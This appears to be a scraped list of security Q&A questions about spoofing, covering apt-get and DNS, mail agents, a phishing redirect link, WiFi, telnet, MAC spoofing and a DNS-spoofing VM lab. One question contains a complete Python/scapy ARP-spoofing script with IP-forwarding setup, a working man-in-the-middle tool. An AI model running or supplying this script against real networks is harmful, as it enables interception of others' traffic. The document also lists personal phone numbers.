Is apt-get secure against DNS Spoofing?

I am aware that installing and updating packages through apt-get should be fairly secure because an attacker supposedly should not be able to interfere or inject packets into the downloads as well as because the packages are signed, with the checksums being verified before(?) the installation.

Consider the case of an attacker performing a man-in-the-middle attack on an apt-get command. If the attacker caused a DNS cache poisoining and redirected the downloads to a server he controls, especially since the downloads are requested using HTTP only, couldn’t the attacker cause the system to download a compromised version of the Release and Packages files, and then push compromised versions of packages to the system? Wouldn’t that then look all correct to apt-get which could then go on to install a compromised package?

Can the attacker not make a mirror of an official repository, compromise some of the packages, say only the firefox or tor packages, modify the Release and Packages file accordingly with the new checksums/hashes then redirect through DNS spoofing the system to download these?

I’m limiting the discussion to downloads from official repositories only.

What prevents malicious servers from spoofing mail transfer agents and/or mail delivery agents?

An email system typically consists of multiple agents:

  • Mail user agent (MUA)
  • Mail submission agent (MSA)
  • Mail tranfer agent (MTA)
  • Mail delivery agent (MDA)

Mail agent netword

Evidently the ‘middlemen’ of this system are a spoofing risk. (Technically the endpoints could also be a spoof risk, but let’s assume in this case that the end users are genuine.)

What methods are used/can be used to protect against these ‘middlemen’ agents being spoofed?

I’ve thought about it myself and the only answer I can come up with is that DNS might provide some sort of limited authentication, though DNS spoofing would still be a risk.


(Image is CC BY-SA 3.0, © Ale2006-from-en.)

How does someone know i clicked a link in an email? URL spoofing? JSON?

Hi html and cybersecurity noob here.

My question is how do hackers/scammers know that i clicked a link? Why is my personal info in the url redirect link? Is this info then being stored in a database and the hacker/scammer knows that because this specific link was clicked it must have been me?

I recieved a dodgy email with a link and was curious. So i activated my VPN and checked the link first on virus total and dr web. I found out that the link redirected several times to different websites.

i have changed the link numbers and letters but the domain is how i recieved it as you see below.

The original link sent to me looked like:

http://gallery.divinerosestore.com/SOME_LETTERS_AND_NUMBERS 

What freaked me out was that the second redirect url contained my email address in the url link. It was in a weird format seperated by commas (,) the link below is not real but is in a format as such:

hdating.us/?s=77auyfdgaukgfdsukg&ed=icl&i= admin77,83907,MY_EMAIL_ADDRESS@service.com,&ts=489234987459 

how i imagine this works is that this information of my email address in being passed on to user “admin77” stored in his database/textfile whatever and he knows that i have clicked his link and he now knows i am susceptible to clicking links and a future target?

I would like to inform myself more about cybersecurity and find out more about the details. Any help would be greatly appresh <3

WiFi security against spoofing attacks

So I am about to install some custom pi cameras that connect to my network via WiFi. I know ppl hack wifi through spoofing ssid. My password is randomly generated and is impossible to brute force even without router protection and a supercomputer. Spoofing on the other hand could reveal my password. Auto connect is disabled. How can I protect my wifi network? Should I use some certificate? Replace my router with a specific secure model?

What are the correct network settings for VirtualBox VMs to allow DNS spoofing attack [on hold]

I need to implement DNS spoofing attack usign VMs. My host network is connected to a Wireless network.

I created one Kali Linux machine (the attacker machine) and another Win10 machine (the victim machine).

I need the victim machine to be able to connect to the Internet as well as be reachable to the attacker.

Can any one help me please on the right network configurations to enable this attack?

The attacker needs the Default Gateway and the victim’s IP. How to get the DG address?

If I setup the VMs network settings as NAT, the ettercap can not see them when I sniff the newtork.

If I set up my VMs with host-only network settings, they see each other but they are in a different subnet than the actual Gateway and hence can not connect to the Internet.

Can you please provide the correct network settings to implement DNS spoofing in VMs environment and a host device connected to Wireless network?

Virtual SIM text spoofing

I recently caught my wife cheating with a co-worker and exchanging multiple text messages (over 3,000 in one month) to a specific number. After I confronted her, I don’t see the number coming up any more, however, a new suspicious number has appeared. When I try calling this number I get a message that the number is “not in service”. If I do a reverse number look-up there is no user information for this number (630-793-6074). The previous number was 630-540-6964. Is there any way to find out if these numbers are linked to the same sender? P.S. is there any way to recover the content of these texts?

Can telnet session be compromised via IP spoofing? [duplicate]

This question already has an answer here:

  • How does IP address spoofing on the Internet work? Who can do it? 4 answers

The scenario is following:

  1. A telnet server which has ACL implemented for telnet connections.
  2. A hacker spoofs IP and tries to connect to the telnet server.

Consider that the hacker knows the password. Will he/she be able to spoof the IP and establish a telnet connection over the internet successfully?

What will be the outcome the actual IP holder is active when the hacker is performing this attack?

Would like to know that what will be the case on every layer of OSI model in any possible outcome.

Not able to load website after ARP Spoofing

I have created ARP Spoofing program using python + scapy. When I run this script with target IP and Gateway IP, I was able to poison the victim’s ARP table. But I cannot load any website on the victim’s computer. I have Forwarded IP in attacker computer,

echo 1 > /proc/sys/net/ipv4/ip_forward 

I used Wireshark too to see any incoming data, but no luck.

Attacker Computer – I am Using Ubuntu 19.04 as an attacker Computer.

Victim Computer – I have created a Virtual Machine (Windows 10) on my attacker Computer, with a bridged network.

Below is the code I am using for ARP Spoofing.

import scapy.all as scapy import time import optparse import sys  def get_arguments():     parser = optparse.OptionParser()     parser.add_option("-t","--target",dest="target",help="Target IP/ Ip Range.")     parser.add_option("-g","--gateway",dest="gateway",help="Gateway IP.")     (options,arguments) = parser.parse_args()     return options  def get_mac(ip):     arp_request = scapy.ARP(pdst = ip)     broadcast =  scapy.Ether(dst="ff:ff:ff:ff:ff:ff")     arp_request_broadcast = broadcast/arp_request     answered_list = scapy.srp(arp_request_broadcast, timeout=1,verbose=False)[0]     return answered_list[0][1].hwsrc  def spoof(target_ip, spoof_ip):     target_mac = get_mac(target_ip)     package = scapy.ARP(op=2,pdst=target_ip,hwdst=target_mac,psrc=spoof_ip)     scapy.send(package,verbose=False)  def restore(destination_ip, source_ip):     destination_mac = get_mac(destination_ip)     source_mac = get_mac(source_ip)     package = scapy.ARP(op=2,pdst=destination_ip,hwdst=destination_mac,psrc=source_ip,hwsrc=source_mac)     scapy.send(package,verbose=False, count=4)  options = get_arguments() target_ip = options.target gateway_ip = options.gateway  if(target_ip == None or gateway_ip==None):     print("[-] Use --help for more information.")     sys.exit()  try:     packet_send_count = 0     while True:         spoof(target_ip,gateway_ip)         spoof(gateway_ip,target_ip)         packet_send_count += 2         print("\r[+] Packet Send : " + str(packet_send_count),end="")         time.sleep(1)  except KeyboardInterrupt:     print("\n\r[-] Quitting.... Restoring ARP Tables---")     restore(target_ip,gateway_ip)     restore(gateway_ip,target_ip) 

Alternative driver for Intel Wireless-AC 3165 to allow mac spoofing

Intel has stopped supporting mac spoofing in their wifi drivers. Are there any open source drivers that allow mac spoofing on Intel Wireless-AC 3165?

Ubuntu 18.04.1 description: Wireless interface        product: Wireless 3165        vendor: Intel Corporation        physical id: 0        bus info: pci@0000:05:00.0        logical name: wlp5s0        version: 79        serial: 08:d4:0c:73:21:3e        width: 64 bits        clock: 33MHz        capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless        configuration: broadcast=yes driver=iwlwifi driverversion=4.18.0-21-generic firmware=29.1044073957.0 ip=192.168.44.244 latency=0 link=yes multicast=yes wireless=IEEE 802.11